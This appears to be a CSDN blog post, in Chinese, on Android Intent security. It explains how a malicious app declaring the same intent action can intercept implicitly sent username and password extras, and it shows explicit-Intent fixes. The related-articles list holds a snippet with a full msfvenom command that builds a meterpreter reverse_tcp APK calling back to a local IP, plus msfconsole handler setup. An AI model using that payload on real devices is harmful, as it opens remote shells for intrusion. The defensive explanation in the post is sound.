android 由于使用Intent传送敏感数据(username password)的安全性考虑

最新推荐文章于 2024-04-29 02:32:13 发布
置顶 最新推荐文章于 2024-04-29 02:32:13 发布
阅读量994 收藏
点赞数 1
分类专栏: 移动app安全测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41508948/article/details/81510396
版权

1. android 密码输入框  

EditText password;

password.setInputType(0x81);

 

2.在几个Acitivy 中使用Intent传送数据的安全性考虑

 

方式一:

 

  Intent intent = new Intent();

 

        intent.putExtra("username",
name);

 

        intent.putExtra("password",
password);

 

        intent.setAction("edu.com.SendIntent.LoginActivity");

 

        intent.addCategory(Intent.CATEGORY_DEFAULT);

 

        startActivity(intent);

 

安全问题:如果在一个hack app 中也定义了相同名称的action:

 

<activity

            android:name=".MainActivity"

            android:label="@string/title_activity_main" >

            <intent-filter>

                <action android:name="edu.com.SendIntent.LoginActivity" />

                <category android:name="android.intent.category.DEFAULT" />

            </intent-filter>

    </activity>

 

那么在intent-filter过滤时,这些信息也将被hack app拦截到。

 

 

两种方式可以防止这个情况发生:

 

方式一:

不使用setAction()隐式获取intent,而使用setClassName()根据包名和类名显式获取intent

 

                Intent intent = new Intent();

 

        intent.putExtra("username",
name);

 

        intent.putExtra("password",
password);

 

        intent.setClassName("edu.com.SendIntent", "edu.com.SendIntent.LoginActivity");

 

        startActivity(intent);

 

 

方式二:

        Intent intent = new Intent(this,MainActivity.class);
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);  
        Bundle bun = new Bundle();
 
        bun.putString("Username", useredit.getText().toString());
        bun.putString("Password", pswedit.getText().toString());
 
        intent.setClass(this, IntentReciever.class);
        intent.putExtras(bun);
        MainActivity.this.startActivity(intent);

weixin_41508948
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android 隐私泄露 路径,一种Android应用隐私泄露漏洞检测方法与流程
weixin_42468901的博客
05-31 758
本发明涉及Android查漏的技术领域,尤其涉及到一种Android应用隐私泄露漏洞检测方法。背景技术:在目前的Android隐私泄露漏洞检测方法,静态污点分析是最常用且最有效的方法。首先对android应用进行反编译,获取其源代码或是间代码,并通过识别代码存在的源点(source)与锚点(sink)来判断是否进行下一步的检测操作,这里的源点与锚点的确定因检测问题而异。如检测应用的隐私泄露...
android 由于使用Intent传送敏感数据username password)的安全性考虑
u011667349的专栏
12-20 1045
1. android 密码输入框   EditText passwordpassword.setInputType(0x81); 2.在几个Acitivy 使用Intent传送数据的安全性考虑 方式一:   Intent intent = new Intent();         intent.putExtra("username", nam
Android核心技术Intent和数据存储篇
程序员哆啦A梦,蓝胖子
07-29 1107
女孩:上海站到了? 男孩:嗯呢走向世界〜 女孩:意向核心技术和数据存储技术? 男孩:对,今日就讲这个〜 意图是各个组件之间用来进行通信的,原意的翻译为“意图”的意思,是传输数据的核心对象,它可以开启一个活动,也可以发送广播消息和开启服务服务,对于他们之间就是通过意图来互相调用和协调工作的。 开启活动: 通过意图对象传递startActivity()和startActivityFo...
AndroidIntent意图安全
nextdoor6的博客
08-30 4080
什么是意图 Intent(意图)主要是用于激活组件和解决Android应用的各项组件之间的通讯。 意图有分为显式意图和隐式意图。 意图的使用 显式意图使用代码,贴出主要显示意图跳转的代码。 public class MainActivity extends ActionBarActivity { @Override protected void onCrea
[可用]android hack
weixin_34247155的博客
02-19 257
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk service apache2 start mv shell.apk /var/www/html msfconsole use exploit/multi/handler set payload android/m...
Intent的数据传输
caliburrrr的博客
06-05 2237
Activity间的数据通信,对于数据量比较大的,避免使用intent+Parcelable的方式,可以考虑EventBus等代替方法,以免造成TransactionTooLargeException;
Android编程使用Intent传递图片的方法详解
08-31
Android开发Intent是用来在组件之间传递数据的重要工具,它可以携带少量的数据或者启动其他Activity。当需要在Activity之间传递较大的数据,如图片时,直接使用Intent可能会超出其承载能力。这时,通常会采取...
Android Intent传递数据大小限制详解
01-04
前言 在sendBroadcast,startActivity时,我们会用到IntentIntent可以携带一些数据,比如基本类型数据...使用Intent传送数据时,可能会出现异常 在Intent传入一个Parcelable对象;例如传入一个bitmap对象。 代
Android Studio 3.0 下使用Intent传递数据和数据回传的示例
11-23
Android Studio 3.0 下使用Intent传递数据和数据回传的示例。实现了一个简单的登录界面,用户输入用户名和密码后,点击登录把用户名和密码传递到主界面,主界面显示用户名和密码,然后在主界面购买一个物品,打开...
AndroidIntent附加数据的两种实现方法
01-04
本文实例讲述了AndroidIntent附加数据的两种实现方法。分享给大家供大家参考。具体如下: 第一种写法,用于批量添加数据到IntentIntent intent = new Intent(); Bundle bundle = new Bundle(); //该类用作携带...
Android Intent传递数据底层分析详细介绍
08-31
由于Android系统会在新的Activity实例化时,根据Intent的数据来创建新对象,即使原始Activity和新Activity位于同一进程和线程,从Intent取出的对象也不会是原始对象的引用,而是原始数据的副本。这就是为什么两...
android应用安全——组件通信安全(Intent
xyzlmn的专栏
04-16 325
这里主要涉及到了Activity、Content Provider、Service、Broadcast Receiver等。这些如果在Androidmanifest.xml配置不当,会被其他应用调用,引起风险。android应用内部的Activity、Service、Broadcast Receiver等,他们通过Intent通信,组件间需要通信就需要在Androidmanifest.xml...
AndroidIntent Filter与安全
weixin_34186931的博客
07-24 81
更多原文请见:http://mobile.51cto.com/abased-349323.htm     IntentAndroid应用程序核心组件之间通信和传递信息的核心机制。与之相关的IntentFilter也具有相关的安全机制(测试)来进行约束。本文将对其进行详细介绍。   一、IntentIntentFilter简介 一个应用程序的三个核心组件(活动,服务和广播接收器)都是...
Intent组件的安全机制
a15659164058的博客
12-15 339
1) IntentIntentFilter简介       Intent(意图)本身是一个包含被执行操作抽象描述的被动的数据结构,对于广播而言,是某件已经发生并被声明的事件的描述。在Android系统存在如下几种不同的机制来传送Intent到每种组件。       (1) 一个Intent对象传递给Context.startActivity()或Context.startActivit
判断Intent是否安全的方法
Markus
08-07 914
提前验证是否有APP可以接受一个Intent,这样可以在发送Intent前,避免发送的Intent没有能够接收的APP,导致FC。 方法一: Intent intent = getInstallAppIntent(activity, appFile); if (activity.getPackageManager().queryIntentActivities(intent, 0).siz...
保护Android上的通信安全
最新发布
2401_84297899的博客
04-29 305
二 更新加密提供程序多年来,HTTPS协议已被多次利用。当安全研究人员报告漏洞时,缺陷通常会被修补。应用修补程序可确保应用程序的网络连接使用最新的行业标准协议。最新版本的协议包含的弱点比以前少。要更新,您需要包含Google Play服务。该服务API还有更多的功能,包括API,检查的网址,看看他们是否已被标记为已知威胁,以及API,以防止垃圾邮件和其他恶意流量您的应用程序。同步完成后摇篮,你可以调用的onProviderInstalled()当提供程序成功更新或已更新时,将调用此方法。
Android Intent安全性检查
我用双手成就你的梦想,所以我必须努力
11-02 1112
在平时的开发,跳转我们自己写的activity的时候,一般都是通过显式intent进行跳转.所以不用做什么安全性检查 但是当我们使用隐式意图来进行调起别的应用的activity时.就需要检查安全性了,否则activity不存在.可是会使程序崩溃的哟 检查intent安全性有以下两种方式: 第一种: /** * 检测 响应某个意图的Activity 是否存在 * @param co
Intent的setClass和setClassName的区别
热门推荐
杂物堆
01-14 1万+
setClass:跳转到与该工程下的(同一个Application的)activity或者service setClassName:跳转到不同Applicaiton的activity或者service摘自慕课网
android Bundle在同类Intent传送数据、复杂的对象
简公子的博客
01-29 488
笔记,自己用: Bundle bundle=new Bundle(); bundle.putString("k2",k2); bundle.putString("k2pos",k2pos); bundle.putString("d2",d2); ...
unity 从Android 自身的intent读取Username数据
05-30
要从Android自身的intent读取Username数据,可以使用Unity的AndroidJavaObject类。以下是一个示例代码: ``` using UnityEngine; public class AndroidIntentReader : MonoBehaviour { void Start() { // 获取AndroidJavaObject对象 AndroidJavaClass unityPlayerClass = new AndroidJavaClass("com.unity3d.player.UnityPlayer"); AndroidJavaObject currentActivity = unityPlayerClass.GetStatic<AndroidJavaObject>("currentActivity"); AndroidJavaObject intent = currentActivity.Call<AndroidJavaObject>("getIntent"); // 从intent获取数据 string username = intent.Call<string>("getStringExtra", "Username"); Debug.Log("Username: " + username); } } ``` 请注意,此示例代码假设您已经在AndroidManifest.xml文件正确配置了您的应用程序以接收传入的intent
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值